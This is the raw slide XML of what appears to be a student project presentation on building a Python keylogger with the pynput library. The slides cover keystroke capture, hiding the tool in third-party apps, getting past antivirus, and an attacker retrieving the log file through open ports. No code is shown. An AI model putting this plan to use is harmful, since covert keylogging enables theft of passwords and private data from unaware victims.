              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="134" name="object 20" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="47520" y="3819600"/>
              <a:ext cx="1733040" cy="3009600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="445320"/>
            <a:ext cx="2356920" cy="1476720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DA</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="18"/>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7FD0BC62-CA77-4EF9-AEAF-1C7D748A88AC}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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37" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209680" y="1600200"/>
            <a:ext cx="5943240" cy="44787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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Outline of Project</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Keyloggers are based on concept of capturing clicks of keys in keyboard by the target user(victim) and mainly used dump crucial information from target.</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Keyloggers are can be available either in hardware or software but software keyloggers are majorly used widely.</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This keyloggers injected in 3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> party apps or files and can be installed automatically to the victim system when they download.</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The keylogger connected to attacker and victim keyboard using direct or indirect connection based on ports available.</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Example; PS/2 and USP keyloggers </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8" name="object 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7991640" y="2933640"/>
            <a:ext cx="2761920" cy="3257280"/>
            <a:chOff x="7991640" y="2933640"/>
            <a:chExt cx="2761920" cy="3257280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139"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40"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41" name="object 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7991640" y="2933640"/>
              <a:ext cx="2761920" cy="3257280"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142"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43" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834120" y="574920"/>
            <a:ext cx="5636520" cy="1312200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="16560" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="2728080"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-21" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ROB</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="52" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-21" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="18" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-372" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-375" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-21" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="object 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>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03584141-FC8A-45B3-9639-22DAB18BE5A1}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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47" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="1905120"/>
            <a:ext cx="5937120" cy="28328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Calibri"/>
              </a:rPr>
              <a:t>Keyloggers are easily detected by antivirus softwares i.e Avast, Malwarebytes etc. And deploying hardware keyloggers is risky task because attacker need to access victim system physically which again involves in gaining knowledge about the system such as username, passwords etc.</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To solve above problem instead of deploying hardware keyloggers or 3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> party keyloggers, we can build own keyloggers.</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8" name="object 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8658360" y="2647800"/>
            <a:ext cx="3533400" cy="3809520"/>
            <a:chOff x="8658360" y="2647800"/>
            <a:chExt cx="3533400" cy="3809520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149"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50"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51" name="object 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8658360" y="2647800"/>
              <a:ext cx="3533400" cy="3809520"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152"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53" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="829800"/>
            <a:ext cx="5263200" cy="1312200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="16560" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="2642760"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PROJECT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-21" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="object 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="20"/>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282AEE0F-D6EA-46F8-B77A-5C9012441E10}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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57" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="1695600"/>
            <a:ext cx="5495400" cy="447876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000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>The main task of keyloggers is to monitor or record keystrokes of keyboard on Operating system which includes identifying paths(I.e websites or tabs).</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To build keylogger python programming language is used as per requirements.</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The library called “pynput” is used here to detect keystrokes of the victim.</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When the program is started, all keystrokes detects and saves to a textfile automatically.</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This textfile is located inside victim system and it can be dumped by attacker directly using open ports or existing connection of 3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> party softwares.</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object 2"/>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59" name="object 3"/>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60"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61" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699480" y="891720"/>
            <a:ext cx="5014080" cy="1161720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="16560" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-21" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="18" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-236" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>AR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-21" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="29" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-46" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-26" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="162" name="object 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723960" y="6172200"/>
            <a:ext cx="2180880" cy="485280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="21"/>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77911E8A-6601-4886-B332-6AE95E170B1A}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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65" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="1695600"/>
            <a:ext cx="5790960" cy="420444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000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Keyloggers are mainly used by attackers to collect sensitive information such as usernames, pins, passwords etc.</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However it can used for general use to identify whether system is accessed by any others physically.</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The concept of monitoring keystrokes in background without aware to user is related to suscpicious activity hence it is  only  benificiable to attackers.</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After getting keystroke text data, attackes are the end users of keyloggers who tries to exploit data of victim.</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Parents or companies also can use to identify activities of child or Employees.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6" name="object 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1476360"/>
            <a:ext cx="2695320" cy="3247560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167"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68"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69"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70" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558000" y="857880"/>
            <a:ext cx="9762840" cy="1158480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-41" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
